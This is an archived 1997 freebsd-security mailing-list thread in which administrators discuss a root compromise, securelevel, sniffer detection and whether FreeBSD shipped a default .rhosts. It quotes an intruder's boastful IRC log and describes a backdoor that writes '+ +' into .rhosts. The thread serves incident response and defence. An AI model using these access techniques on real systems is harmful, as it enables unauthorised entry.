Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Vincent Poy wrote: > I know but when all the admins are remote, it has to be done > multiuser. Is there a way to push the secure level up to 2 and then push > it down when a make world is needed? It wouldn't be very secure then would it. /* Matthew N. Dodd | A memory retaining a love you had for life winter@jurai.net | As cruel as it seems nothing ever seems to http://www.jurai.net/~winter | go right - FLA M 3.1:53 */ From owner-freebsd-security Mon Jul 28 18:59:58 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id SAA23739 for security-outgoing; Mon, 28 Jul 1997 18:59:58 -0700 (PDT) Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id SAA23727 for ; Mon, 28 Jul 1997 18:59:54 -0700 (PDT) Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id VAA04917; Mon, 28 Jul 1997 21:59:40 -0400 (EDT) Date: Mon, 28 Jul 1997 21:59:39 -0400 (EDT) From: Robert Watson Reply-To: Robert Watson To: Brian Buchanan cc: "Nicole H." , security@FreeBSD.ORG Subject: Re: Detecting sniffers (was: Re: security hole in FreeBSD) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Brian Buchanan wrote: > On Mon, 28 Jul 1997, Nicole H. wrote: > > > Does anyone know of a good way to detect people "sniffing" on the network? IE a program that will detect a > > machine running in promiscuous mode? > > > > I was wondering the same thing when I read a clause prohibiting the use of > network cards in promiscuous mode in the CMU network use policy. I asked > some computer security people I knew about this and their response was > that it is not possible to detect if a network card is in promiscious mode > unless you have access to the machine it's in - i.e., that you can look at > ifconfig on that machine. As far as I know, there is no way to tell. The card has a filter on it that normal just doesn't provide the packets that aren't intended for the host. Promiscuous mode simply disables the filter. The only way to prevent the packets from being sniffable is to prevent them from going on the wire in question -- smart hubs (switches) do this, so are desirable. They also increase available bandwidth, as only the required traffic goes on a segment. They're also more expensive, although prices are really dropping. Robert N Watson Junior, Logic+Computation, Carnegie Mellon University http://www.cmu.edu/ Network Security Research, Trusted Information Systems http://www.tis.com/ Network Administrator, SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org rwatson@tis.com http://www.watson.org/~robert/ From owner-freebsd-security Mon Jul 28 19:02:02 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id TAA24030 for security-outgoing; Mon, 28 Jul 1997 19:02:02 -0700 (PDT) Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id TAA23972 for ; Mon, 28 Jul 1997 19:01:22 -0700 (PDT) Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id WAA04931; Mon, 28 Jul 1997 22:01:01 -0400 (EDT) Date: Mon, 28 Jul 1997 22:01:00 -0400 (EDT) From: Robert Watson Reply-To: Robert Watson To: Vincent Poy cc: "Matthew N. Dodd" , security@FreeBSD.ORG, JbHunt , "[Mario1-]" Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Vincent Poy wrote: > On Mon, 28 Jul 1997, Matthew N. Dodd wrote: > > =)On Mon, 28 Jul 1997, Vincent Poy wrote: > =)> That wouldn't do any good if the user can chflags noschg on the > =)> binaries you have schg on. > =) > =)'man init' > > True but if you needed to compile -current, you would need to > remove the schg flags on some binaries before the make world. Hence my suggestion that you boot from floppy. You now know you are running the correct kernel, and have the required set of utilities to get things going. To be entirely honest, if you system is that hacked to pieces, you really need to reinstall. The chances of missing something at this point are just to great. Robert N Watson Junior, Logic+Computation, Carnegie Mellon University http://www.cmu.edu/ Network Security Research, Trusted Information Systems http://www.tis.com/ Network Administrator, SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org rwatson@tis.com http://www.watson.org/~robert/ From owner-freebsd-security Mon Jul 28 19:03:07 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id TAA24071 for security-outgoing; Mon, 28 Jul 1997 19:03:07 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id TAA24033 for ; Mon, 28 Jul 1997 19:02:11 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id TAA07718; Mon, 28 Jul 1997 19:01:52 -0700 (PDT) Date: Mon, 28 Jul 1997 19:01:51 -0700 (PDT) From: Vincent Poy To: "Matthew N. Dodd" cc: security@FreeBSD.ORG, JbHunt , "[Mario1-]" Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Matthew N. Dodd wrote: =)On Mon, 28 Jul 1997, Vincent Poy wrote: =)> I know but when all the admins are remote, it has to be done =)> multiuser. Is there a way to push the secure level up to 2 and then push =)> it down when a make world is needed? =) =)It wouldn't be very secure then would it. You're right about that one. But wouldn't it still be possible to kill the init process? Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 19:05:45 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id TAA24359 for security-outgoing; Mon, 28 Jul 1997 19:05:45 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id TAA24302 for ; Mon, 28 Jul 1997 19:04:52 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id TAA07733; Mon, 28 Jul 1997 19:04:35 -0700 (PDT) Date: Mon, 28 Jul 1997 19:04:35 -0700 (PDT) From: Vincent Poy To: Robert Watson cc: "Matthew N. Dodd" , security@FreeBSD.ORG, JbHunt , "[Mario1-]" Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Robert Watson wrote: =)Hence my suggestion that you boot from floppy. You now know you are =)running the correct kernel, and have the required set of utilities to get =)things going. To be entirely honest, if you system is that hacked to =)pieces, you really need to reinstall. The chances of missing something at =)this point are just to great. That would be true except non of the admins are local users. All of us run the machine remotely. The owner who has physical access to the machines is out of town for 2-4 months and people taking care of the Estate wouldn't know what's what even if I guided them on the phone. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 19:20:14 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id TAA25456 for security-outgoing; Mon, 28 Jul 1997 19:20:14 -0700 (PDT) Received: from sasami.jurai.net (winter@sasami.jurai.net [207.96.1.17]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id TAA25447 for ; Mon, 28 Jul 1997 19:20:09 -0700 (PDT) Received: from localhost (winter@localhost) by sasami.jurai.net (8.8.5/8.8.5) with SMTP id WAA00549; Mon, 28 Jul 1997 22:20:06 -0400 (EDT) Date: Mon, 28 Jul 1997 22:20:05 -0400 (EDT) From: "Matthew N. Dodd" To: Vincent Poy cc: security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Vincent Poy wrote: > You're right about that one. But wouldn't it still be possible to > kill the init process? Go for it. /* Matthew N. Dodd | A memory retaining a love you had for life winter@jurai.net | As cruel as it seems nothing ever seems to http://www.jurai.net/~winter | go right - FLA M 3.1:53 */ From owner-freebsd-security Mon Jul 28 19:31:31 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id TAA26365 for security-outgoing; Mon, 28 Jul 1997 19:31:31 -0700 (PDT) Received: from helium.vapornet.com (root@helium.vapornet.com [208.202.126.112]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id TAA26345 for ; Mon, 28 Jul 1997 19:31:26 -0700 (PDT) Received: from argon.vapornet.com (oakbrook1-24.ebs.net [207.19.130.56]) by helium.vapornet.com (8.8.6/VaporServer-2.5+SpamNot) with ESMTP id VAA02681 for ; Mon, 28 Jul 1997 21:31:33 -0500 (CDT) Received: by argon.vapornet.com (8.8.6/VaporClient-1.1.1) id VAA03478; Mon, 28 Jul 1997 21:31:41 -0500 (CDT) Date: Mon, 28 Jul 1997 21:31:41 -0500 (CDT) Message-Id: <199707290231.VAA03478@argon.vapornet.com> From: John Preisler MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: References: <9758.870137085@orion.webspan.net> X-Mailer: VM 6.22 under 19.15 XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk I'm not convinced that FreeBSD installs a /root/.rhosts by default. None of my boxes have it. -jrp From owner-freebsd-security Mon Jul 28 19:53:41 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id TAA28666 for security-outgoing; Mon, 28 Jul 1997 19:53:41 -0700 (PDT) Received: from thought.res.cmu.edu (THOUGHT.RES.CMU.EDU [128.2.94.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id TAA28651 for ; Mon, 28 Jul 1997 19:53:33 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by thought.res.cmu.edu (8.8.5/8.6.12) with SMTP id WAA27482; Mon, 28 Jul 1997 22:52:38 -0400 (EDT) Date: Mon, 28 Jul 1997 22:52:37 -0400 (EDT) From: Brian Buchanan To: Vincent Poy cc: security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Vincent Poy wrote: > =)> I know but when all the admins are remote, it has to be done > =)> multiuser. Is there a way to push the secure level up to 2 and then push > =)> it down when a make world is needed? > =) > =)It wouldn't be very secure then would it. > > You're right about that one. But wouldn't it still be possible to > kill the init process? That'll either take the system into single-user mode, cause it to reboot, or cause it to halt. I forget which. No matter which of those happens, it won't put the system back into multi-user with a lower securelevel, assuming you have the kernel go secure at startup (which you should if you intend to use securelevel). From owner-freebsd-security Mon Jul 28 20:30:29 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id UAA02338 for security-outgoing; Mon, 28 Jul 1997 20:30:29 -0700 (PDT) Received: from destiny.erols.com (root@destiny.erols.com [207.96.73.65]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id UAA02311 for ; Mon, 28 Jul 1997 20:30:15 -0700 (PDT) Received: from destiny.erols.com (someone@destiny.erols.com [207.96.73.65]) by destiny.erols.com (8.8.6/8.6.12) with SMTP id XAA15006; Mon, 28 Jul 1997 23:29:44 -0400 (EDT) Date: Mon, 28 Jul 1997 23:29:43 -0400 (EDT) From: John Dowdal To: Vincent Poy cc: security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Forward this junk to abuse@erols.com, and try calling 703-321-8000, or 888-EROL-NET or 1-800-EROLS-PC [descreasing likeliness of helping]. If you call, be extremely agressive about getting to a higher-level person. Consider mentioning severe legal problems if they fail to fence in the hacker. Keep in mind that you only have a .signature with the erols account, so it may be bogus. John On Mon, 28 Jul 1997, Vincent Poy wrote: > On Mon, 28 Jul 1997, Jordan K. Hubbard wrote: > > =)> Well, because I connect to the system using telnet ;) Also, this > =) > =)That proves absolutely nothing. You think I can't hack a telnetd to > =)provide multiple "services?" Wake up, Vinnie! :-) > > Ofcourse you could but you're not in the same type of hacking > business this guy is in. This is a log of a irc chat session. > > > >From johnnyu@accessus.net Mon Jul 28 17:01:43 1997 > Date: Mon, 28 Jul 1997 18:38:32 -0500 (CDT) > From: NoHackMe! > To: security@netcom.com > Cc: vince@mcestate.com, mario1@primenet.com > Subject: Logs (Gaianet.net) > > Here is a log I just got from talking with theca the hacker! > > Session Start: Mon Jul 28 18:16:14 1997 > [18:16] yeah > [18:16] hi > [18:16] wasup > that was nice of you > last night > [18:16] what? pasting the root pass all over efnet? > yea > [18:16] so was icmp pinging me > you shouldn't have hacked the machine > [18:17] i was nice till that started > aside from that the minor ping that you got was > nothing > you have created a HUGE DOS situation for the entire > company > [18:17] i'll show you all the pings i got > [18:17] 1 sec. > I don't care? > [18:17] ok > You were pinged > why? > [18:18] why am i causing a dos? > [18:18] bring your machines back up > well let's see you changed the root passwd > handed it out > [18:18] Jul 28 02:29:45 soma icmplog: ping from > venus.GAIANET.NET > [18:18] Jul 28 02:30:19 soma last message repeated 10 > times > [18:18] Jul 28 02:31:20 soma last message repeated 18 > times > [18:18] Jul 28 02:32:04 soma last message repeated 64 > times > [18:18] Jul 28 02:38:52 soma last message repeated 31 > times > [18:18] Jul 28 02:39:53 soma last message repeated 54 > times > [18:18] Jul 28 02:40:54 soma last message repeated 60 > times > [18:18] Jul 28 02:41:37 soma last message repeated 42 > times > [18:18] i changed the root passwd to 'root' > someone changed the inetd.conf and rebooted > [18:18] yeah > [18:18] i didn't do that > so now all the machines are pretty much denying all > hosts > we don't care to much > [18:19] one of the windows lusers who saw my paste > as far as we're concerned your the cause of the > problem > [18:19] umm > [18:19] why don't you fix the inetd.conf > let's put it like this > [18:19] instead of bitching about it > that system is admin'd remotely > that system is admin'd remotely > [18:20] so NO one has physical access to the machine? > your actions caused the main unix boxes on the lan > not at the present time the owners are out of the > country > [18:20] so go drive over there or something and boot > it up > [18:20] i told you the root pass... > anything I did to you was in an attempt to thwart > your efforts to take control > all of my feable efforts failed > your a super leet spoof aren't you who's caching > your dns > [18:22] i'm caching it > [18:22] on an authorative ns box i rooted > Hmm that neet > [18:23] yep > That would explain why netcom security can't find > you on the portmaster > ________________________________________ > | TheCa (theca@wil-de7-10.ix.netcom.com) > | name : No bodies ever knew... > | serv : irc.pacbell.net > > [18:24] tell netcom to change the !root pass on some > of their portmasters > [18:24] just to be umm safe > [18:25] netcom has no security...it's a joke > that's good > [18:25] netcom shell security is great > [18:25] ppp security == null > [18:26] they've got the biggest REAL isp (not > including aol, etc)...you think they can keep track or even > try to keep track of everyone? > [18:26] they have well over half a million users > you think they can find you? > you think they can find you? > Session Close: Mon Jul 28 18:32:07 1997 > > [18:28] Jul 28 19:28:14 soma pppd[16376]: Modem hangup > [18:28] Jul 28 19:28:14 soma pppd[16376]: Connection terminated. > [18:28] Jul 28 19:28:14 soma pppd[16376]: Exit. > [18:29] *clap clap* > [18:29] nice > > [18:30] i'll see if that netcom acct is still up > he probably doesn't have the account > (!) The time is now 6:30pm. > [18:30] something like "connect S0" or the port > they just dumped the entire wilmington port > [18:30] ah > [18:30] heh > [18:30] that's stupid > [18:30] now there's no way they'll find me > ________________________________________ > | TheCa_ (theca@phd-as15s15.erols.com) > > That's it John basically he admits it and implies he has control over at > least one of your portmasters and possibly one of your dns servers. This > is a serious security issue for us and should be for you. If you have ANY > contacts at erols.com please forward this to them and cc us if you would. > > John Urschel > Gaianet Unix Administrator > > > > Cheers, > Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ > Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] > GaiaNet Corporation - M & C Estate / / / / | / | __] ] > Beverly Hills, California USA 90210 / / / / / |/ / | __] ] > HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] > > > From owner-freebsd-security Mon Jul 28 20:41:43 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id UAA03143 for security-outgoing; Mon, 28 Jul 1997 20:41:43 -0700 (PDT) Received: from andrsn.stanford.edu (root@andrsn.Stanford.EDU [36.33.0.163]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id UAA03138 for ; Mon, 28 Jul 1997 20:41:40 -0700 (PDT) Received: from localhost (andrsn@localhost.stanford.edu [127.0.0.1]) by andrsn.stanford.edu (8.8.5/8.6.12) with SMTP id UAA23091; Mon, 28 Jul 1997 20:41:32 -0700 (PDT) Date: Mon, 28 Jul 1997 20:41:32 -0700 (PDT) From: Annelise Anderson To: John Preisler cc: security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: <199707290231.VAA03478@argon.vapornet.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, John Preisler wrote: > I'm not convinced that FreeBSD installs a /root/.rhosts by default. > None of my boxes have it. > > -jrp Neither do mine. Annelise From owner-freebsd-security Mon Jul 28 21:10:12 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id VAA05709 for security-outgoing; Mon, 28 Jul 1997 21:10:12 -0700 (PDT) Received: from rocky.mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id VAA05703 for ; Mon, 28 Jul 1997 21:10:07 -0700 (PDT) Received: (from nate@localhost) by rocky.mt.sri.com (8.7.5/8.7.3) id WAA10250; Mon, 28 Jul 1997 22:09:50 -0600 (MDT) Date: Mon, 28 Jul 1997 22:09:50 -0600 (MDT) Message-Id: <199707290409.WAA10250@rocky.mt.sri.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Vincent Poy Cc: "Jonathan A. Zdziarski" , security@freebsd.org Subject: Re: security hole in FreeBSD In-Reply-To: References: X-Mailer: VM 6.29 under 19.15 XEmacs Lucid Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Vincent Poy writes: > Apparently FreeBSD ships with .rhosts in the root account. Apparently you've yet to find a clue. Go rub yourself with clue juice, and dance the clue dance, and maybe you'll get one. Nate From owner-freebsd-security Mon Jul 28 21:13:00 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id VAA05909 for security-outgoing; Mon, 28 Jul 1997 21:13:00 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id VAA05904 for ; Mon, 28 Jul 1997 21:12:57 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id VAA08131; Mon, 28 Jul 1997 21:12:45 -0700 (PDT) Date: Mon, 28 Jul 1997 21:12:44 -0700 (PDT) From: Vincent Poy To: Nate Williams cc: "Jonathan A. Zdziarski" , security@freebsd.org, JbHunt , "[Mario1-]" Subject: Re: security hole in FreeBSD In-Reply-To: <199707290409.WAA10250@rocky.mt.sri.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Nate Williams wrote: =)Vincent Poy writes: =)> Apparently FreeBSD ships with .rhosts in the root account. =) =)Apparently you've yet to find a clue. Go rub yourself with clue juice, =)and dance the clue dance, and maybe you'll get one. Nothing is unhackable. and the hacker did say it was the .rhosts file along with perl5.00401 that did it. Nothing is foolproof. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 21:16:24 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id VAA06197 for security-outgoing; Mon, 28 Jul 1997 21:16:24 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id VAA06187 for ; Mon, 28 Jul 1997 21:16:21 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id VAA08152; Mon, 28 Jul 1997 21:16:13 -0700 (PDT) Date: Mon, 28 Jul 1997 21:16:12 -0700 (PDT) From: Vincent Poy To: John Preisler cc: security@FreeBSD.ORG, JbHunt , "[Mario1-]" Subject: Re: security hole in FreeBSD In-Reply-To: <199707290231.VAA03478@argon.vapornet.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, John Preisler wrote: =)I'm not convinced that FreeBSD installs a /root/.rhosts by default. =)None of my boxes have it. It doesn't on 2.2.2R but it does on 2.1R installations. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 21:19:47 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id VAA06420 for security-outgoing; Mon, 28 Jul 1997 21:19:47 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id VAA06407 for ; Mon, 28 Jul 1997 21:19:42 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id VAA08170; Mon, 28 Jul 1997 21:19:25 -0700 (PDT) Date: Mon, 28 Jul 1997 21:19:25 -0700 (PDT) From: Vincent Poy To: John Dowdal cc: security@FreeBSD.ORG, JbHunt , "[Mario1-]" Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, John Dowdal wrote: =)Forward this junk to abuse@erols.com, and try calling 703-321-8000, or =)888-EROL-NET or 1-800-EROLS-PC [descreasing likeliness of helping]. If =)you call, be extremely agressive about getting to a higher-level person. =)Consider mentioning severe legal problems if they fail to fence in the =)hacker. I'll try but some of these ISPs take like 3 weeks to respond even if you mention legal action. They don't think you can do anything to them because they are out of state. =)Keep in mind that you only have a .signature with the erols account, so it =)may be bogus. That's true too since we only know that is the ip number he is using for his ppp session and it's non-static. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 21:28:01 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id VAA06961 for security-outgoing; Mon, 28 Jul 1997 21:28:01 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id VAA06925 for ; Mon, 28 Jul 1997 21:27:55 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id VAA08220 for ; Mon, 28 Jul 1997 21:27:50 -0700 (PDT) Date: Mon, 28 Jul 1997 21:27:48 -0700 (PDT) From: Vincent Poy To: security@FreeBSD.ORG Subject: .rhosts file Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk i just checked and I made the wrong assumption of .rhosts in root for 2.2.2R or 2.2.1R but the machine installed from a 2.1.7R CD-ROM had it in root with the following contents: # This file should NOT be group or other readable. #OtherMachine #OtherMachine myFriend The file is dated February 19, 1997. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 21:35:32 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id VAA07440 for security-outgoing; Mon, 28 Jul 1997 21:35:32 -0700 (PDT) Received: from hauki.clinet.fi (root@hauki.clinet.fi [194.100.0.1]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id VAA07420; Mon, 28 Jul 1997 21:35:25 -0700 (PDT) Received: from katiska.clinet.fi (root@katiska.clinet.fi [194.100.0.4]) by hauki.clinet.fi (8.8.6/8.8.6) with ESMTP id HAA07028; Tue, 29 Jul 1997 07:34:20 +0300 (EET DST) Received: (hsu@localhost) by katiska.clinet.fi (8.8.6/8.6.4) id HAA22497; Tue, 29 Jul 1997 07:34:20 +0300 (EEST) Date: Tue, 29 Jul 1997 07:34:20 +0300 (EEST) Message-Id: <199707290434.HAA22497@katiska.clinet.fi> From: Heikki Suonsivu To: Vincent Poy Cc: Gary Palmer , security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: References: <3749.870135741@orion.webspan.net> Organization: Clinet Ltd, Espoo, Finland Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Vincent Poy writes: > Machines are offline already. The hacker confronted us and said > that it was the default .rhosts file that came in the FreeBSD root account > and he used perl5.00401 which had a security hole and then used rlogin to > login to another machine without the password. There is no default .rhosts file in FreeBSD, so the hacker is probably trying to avoid telling you what was the real hole. Just for reference, there are large number of irc scripts which contain backdoors (often well-disguised), which usually create .rhosts file with "+ +" in it. The easiest way is to trick someone in the machine to run one of those scripts and it opens the machine, then use one of the FreeBSD holes or local misconfigurations to open the rest. > Cheers, > Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ > Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] > GaiaNet Corporation - M & C Estate / / / / | / | __] ] > Beverly Hills, California USA 90210 / / / / / |/ / | __] ] > HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] -- Heikki Suonsivu, T{ysikuu 10 C 83/02210 Espoo/FINLAND, hsu@clinet.fi mobile +358-40-5519679 work +358-9-43542270 fax -4555276 From owner-freebsd-security Mon Jul 28 21:39:46 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id VAA07652 for security-outgoing; Mon, 28 Jul 1997 21:39:46 -0700 (PDT) Received: from shell6.ba.best.com (jkb@shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id VAA07646 for ; Mon, 28 Jul 1997 21:39:44 -0700 (PDT) Received: from localhost (jkb@localhost) by shell6.ba.best.com (8.8.5/8.7.3) with SMTP id VAA14694; Mon, 28 Jul 1997 21:39:39 -0700 (PDT) X-Authentication-Warning: shell6.ba.best.com: jkb owned process doing -bs Date: Mon, 28 Jul 1997 21:39:39 -0700 (PDT) From: Jan Koum X-Sender: jkb@shell6.ba.best.com To: Annelise Anderson cc: John Preisler , security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Well, yes and no. Yes: FreeBSD installs dot.rhosts in /usr/share/skel where by default new dot.files come from into user directories. Of course, most (some?) of people change the files in the directory or 